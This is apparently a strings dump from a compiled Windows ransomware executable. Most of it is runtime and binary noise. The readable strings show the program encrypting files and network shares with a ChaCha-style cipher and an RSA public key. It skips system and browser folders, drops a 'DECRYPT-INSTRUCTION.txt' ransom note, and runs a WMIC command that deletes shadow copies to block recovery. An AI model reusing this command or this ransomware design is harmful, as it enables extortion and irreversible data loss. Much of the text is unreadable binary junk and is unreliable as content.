!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@.rsrc
@.reloc
x AVAWI
|$0A_A^
UATAUAVAWH
H+L$PH
gfffffffH
gfffffff
H+L$PH
A_A^A]A\]
WAVAWH
A_A^_
` UAVAWH
\$ UVWATAUAVAWH
A_A^A]A\_^]
L$ SVW
L$ SVW
L$ SUVWH
L$ SUVWH
UATAUAVAWH
]'fD9#t
A_A^A]A\]
WAVAWH
SUVWATAUAVAWH
hA_A^A]A\_^][
H9.vCH
PfA9;t
L$ VWAVH
x UATAUAVAWH
A_A^A]A\]
UATAUAVAWH
D9D$0v
D$PfD9
A_A^A]A\]
t$Pf91t
@USVWAWH
A__^[]
u/HcH<H
WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
VWATAVAWH
A_A^A\_^
WATAUAVAWH
A_A^A]A\_
H;xXu5
AUAVAWH
u4I9}(
;I9}(tiH
0A_A^A]
UVWATAUAVAWH
`A_A^A]A\_^]
@USVWATAUAVAWH
A_A^A]A\_^[]
UVWATAUAVAWH
A_A^A]A\_^]
@SVWATAUAVAWH
L!|$(L!
D$0HcH
pA_A^A]A\_^[
B(I9A(u
SVWATAUAVAWH
0A_A^A]A\_^[
t$ WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
0A_A^A]A\_
UVWATAUAVAWH
ryf;\$l
ref;\$t
rQf;\$|
f;\$4r
f;\$<r
f;\$Dr
r|f;\$l
rhf;\$t
rTf;\$|
A_A^A]A\_^]
S(HcS0
S(HcS0
S(HcS0
S(HcS0
S(HcS0
S(HcS0
D$@H;F
D$@H;F
kL@8o(u
<htl<jt\<lt4<tt$<wt
|$ UATAUAVAWH
A_A^A]A\]
t$ WATAUAVAWH
|T4fD;
c@D9kHtkH
l$0Lc@
A_A^A]A\_
D$18F(u
WAVAWH
A_A^_
@USVWATAVAWH
A_A^A\_^[]
@USVWATAVAWH
A_A^A\_^[]
u3HcH<H
WATAUAVAWH
A_A^A]A\_
UVWAVAWH
0A_A^_^]
WAVAWH
A_A^_
WAVAWH
A_A^_
p0R^G'
D$0@8{
p*W4H
p*W4H
t$ WATAUAVAWH
gfffffffH
A_A^A]A\_
{ AUAVAWH
0A_A^A]
t$xt*3
WAVAWH
A_A^_
x ATAVAWH
A_A^A\
L$ VWAVH
fD94H}aD
fD9t$b
u$D8r(t
D81uUL9r
uED8r(t
vAD8s(t
u$D8r(t
fD91uTL9r
uED8r(t
v@D8s(t
UVWATAUAVAWH
PA_A^A]A\_^]
WATAUAVAWH
0A_A^A]A\_
H9>u+A
@USVWATAUAVH
D8t$ht
D8t$ht
A^A]A\_^[]
f9)u4H9j
u%@8j(t
l$ VWATAVAWH
L$&8\$&t,8Y
A_A^A\_^
WATAUAVAWH
A_A^A]A\_
p0R^G'
t$ WATAUAVAWH
D!|$xA
A_A^A]A\_
L$ VWAVH
@UATAUAVAWH
e0A_A^A]A\]
SUVWATAVAWH
A_A^A\_^][
@USVWATAVAWH
A_A^A\_^[]
WATAUAVAWH
0A_A^A]A\_
ATAUAVH
L$ fff
L$ |+L;
A^A]A\
@UATAUAVAWH
A_A^A]A\]
WAVAWH
A_A^_
UVWATAUAVAWH
fB9<I}1L
A_A^A]A\_^]
VWATAVAW
A_A^A\_^
VATAUAVAWH
0A_A^A]A\^
@USVWATAUAVAWH
H!D$ H
xA_A^A]A\_^[]
ffffff
fffffff
@SUVWATAVAWH
@A_A^A\_^][
ATAVAWH
A_A^A\
USVWAVH
A^_^[]
LcA<E3
fffffff
ffffff
vKfffff
fffffff
fffffff
WinMain
Code1: %d. error %d
Code2: %d. error %d
Detected attribute read only.
encryptPrepare
Failed to open file.
ZwSetInformationFile failed.
Failed to open file for encrypt. Error: %d
Failed to get entropy for key
initKeyHeader
Failed to get entropy for nonce
Failed to encrypt key header
writeKeyHeader
Failed to write keydata. Error: %d
Failed to open file for encrypt.
FileCrypt::encryptFile
File information query failed.
File is small.
Failed to allocate buffer.
Failed to initialize key header.
Failed to read file. Error: %d
Failed to write file. Error: %d
Failed to write key header. Error: %d
Failed to initialize crypto api.
CoreService::getCryptoProvider
[%s] %s
CryptImportKey failed with error: %d
CryptoApi::importPublic
CryptAcquireContextA failed with error: %d
CryptoApi::init
Failed to encrypt with error: %d
CryptoApi::encrypt
Allocation failed
buildObjectAttributes
Failed to build object attributes
Fs::getFileAttributes
Fs::open
expand 32-byte k
expand 16-byte k
D7q/;M
Detected restricted extension!
processFile
Some error
processDirectoryInternal
DecryptInstruction::emplaceInstruction
Failed to write instruction note
Unknown exception
bad allocation
bad array new length
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__swift_3
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
bad exception
(null)
CorExitProcess
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
AreFileApisANSI
LCMapStringEx
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
[aOni*{
~ $s%r
@b;zO]
v2!L.2
1#QNAN
1#SNAN
UUUUUU
UUUUUU
=imb;D
/>58d%
VM >cQ6
>jtm}S
)>6{1n
+f)>0'
;H9>&X
*StO9>T
n03>Pu
K~Je#>!
bp(=>?g
BC?>6t9^
K&>.yC
.xJ>Hf
y\PD>!
|b=})>
c [1>H'
uzKs@>
3>N;kU
kE>fvw
V6E>`"(5
?UUUUUU
?7zQ6$
.text$di
.text$mn
.text$mn$00
.text$mn$21
.text$x
.text$yd
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$00
.rdata$r
.rdata$voltmd
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.data$rs
.pdata
.rsrc$01
.rsrc$02
ZwClose
ZwSetInformationFile
ZwOpenFile
NtQueryAttributesFile
ZwQueryInformationFile
ZwReadFile
NtWriteFile
NtWaitForSingleObject
ZwWaitForSingleObject
ntdll.dll
GetLastError
WaitForMultipleObjects
CreateThread
GetLogicalDrives
OutputDebugStringA
OutputDebugStringW
CloseHandle
FindClose
FindFirstFileW
FindNextFileW
MoveFileW
GlobalAlloc
GlobalFree
CreateFileW
WaitForSingleObject
CreateProcessW
GetNativeSystemInfo
Wow64DisableWow64FsRedirection
Wow64RevertWow64FsRedirection
lstrcpyW
GetCurrentProcessId
TerminateProcess
KERNEL32.dll
wsprintfW
USER32.dll
CoUninitialize
CoInitializeEx
CoInitializeSecurity
CoSetProxyBlanket
CoCreateInstance
ole32.dll
OLEAUT32.dll
CryptAcquireContextA
CryptReleaseContext
CryptDestroyKey
CryptGenRandom
CryptImportKey
CryptEncrypt
ADVAPI32.dll
WNetOpenEnumW
WNetEnumResourceW
WNetCloseEnum
MPR.dll
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
RtlUnwindEx
RtlPcToFileHeader
IsDebuggerPresent
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetStartupInfoW
IsProcessorFeaturePresent
GetModuleHandleW
QueryPerformanceCounter
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
RaiseException
SetLastError
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
GetProcAddress
LoadLibraryExW
EncodePointer
GetCurrentProcess
ExitProcess
GetModuleHandleExW
GetModuleFileNameW
GetStdHandle
WriteFile
HeapFree
HeapAlloc
GetFileType
FindFirstFileExW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
GetCommandLineA
GetCommandLineW
MultiByteToWideChar
WideCharToMultiByte
GetEnvironmentStringsW
FreeEnvironmentStringsW
FlsAlloc
FlsGetValue
FlsSetValue
FlsFree
LCMapStringW
GetProcessHeap
SetStdHandle
GetStringTypeW
SetFilePointerEx
HeapSize
HeapReAlloc
FlushFileBuffers
GetConsoleOutputCP
GetConsoleMode
WriteConsoleW
IDLuR0
wJ6Z9B
LOMiWz
@/1Z]f/
}c3YZk|
{!*|oEa
r8xqay
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVbad_array_new_length@std@@
.?AVbad_exception@std@@
.?AVtype_info@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
Start share: %s
s[%hs] %s
$recycle.bin
system volume information
windows
perflogs
.cache
microsoft
Mozilla*
Google*
Windows*
desktop.ini
Failed to move file! Original: %s, New path: %s
DECRYPT-INSTRUCTION.txt
Create instruction note: %s
Failed to create instruction note: %s. err %d
__ProviderArchitecture
ROOT\CIMV2
SELECT * FROM Win32_ShadowCopy
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='%s'" delete
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
api-ms-
(null)
mscoree.dll
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
api-ms-win-core-datetime-l1-1-1
api-ms-win-core-file-l1-2-4
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
kernelbase
api-ms-win-appmodel-runtime-l1-1-2
user32
ext-ms-
((((( H
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
You are stupid idiot
Your files have been encrypted with strong algorithm.